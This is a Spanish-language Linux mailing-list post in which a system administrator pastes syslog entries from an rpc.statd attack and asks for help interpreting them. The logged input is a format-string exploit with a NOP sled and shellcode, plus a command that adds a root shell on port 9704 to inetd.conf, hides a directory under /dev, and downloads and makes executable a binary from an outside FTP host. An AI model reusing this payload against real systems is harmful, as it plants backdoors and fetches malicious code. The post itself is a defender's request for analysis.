[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]Buen día: Hace poco se posteó un boletín de seguridad aquí en el foro, ok pues inmediatamente me dí a la tarea de actualizar lo necesario pero revisando los logs me encontré con ésto en el /var/log/messages se los mando a ver si alguien me puede ayudar a interpretar. Gracias Aug 27 23:40:33 quad rpc.statd[397]: SM_MON request for hostname containing'/':^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ ¿%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x% 0242x%n%055x%n%012x%n%0192x%n<90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90>ëK^<89>v¬<83>î<8D>^ (<83>Æ<89>^°<83>î<8D>^.<83>Æ<83>Ã<83>ë#<89>^´1À<83>î<88>F'<88>F*<83>Æ <88>F«<89>F¸°+, <89>ó<8D>N¬<8D>V¸Í<80>1Û<89>Ø@Í<80>è°ÿÿÿ/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall-HUP inetd; mkdir /dev/... ; cd /dev/... ; ncftpget ftp://sctrx:sctrxz@206.132.179.136/imp ;chmod+x imp Aug 27 23:40:33 quad rpc.statd[397]: POSSIBLE SPOOF/ATTACK ATTEMPT! Aug 27 23:40:33 quad rpc.statd[397]: STAT_FAIL to localhost for SM_MON of ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x%08x%08x%08x%08x%08x%08x%08x%08x%0242x%n%055x%n%012x%n%0192x%n<90 90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90>ëK^<89>v¬<83>î <8D>^(<83>Æ<89>^°<83>î<8D>^.<83>Æ<83>Ã<83>ë#<89>^´1À<83>î<88>F'<88>F*<83>Æ <88>F«<89>F¸°+, <89>ó<8D>N¬<8D>V¸Í<80>1Û<89>Ø@Í<80>è°ÿÿÿ/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd; mkdir /dev/... ; cd /dev/... ; ncftpget ftp://sctrx:sctr xz@206.132.179.136/imp ; chmod +x imp -- In a world without fences,... who needs gates? Salu2! ___________________ Andrés M. Benavides ICQ: 3341979 -- In a world without fences,... who needs gates? Salu2! ___________________ Andrés M. Benavides ICQ: 3341979 --------------------------------------------------------- para salir de la lista, enviar un mensaje con las palabras "unsubscribe ayuda" en el cuerpo a majordomo en linux org mx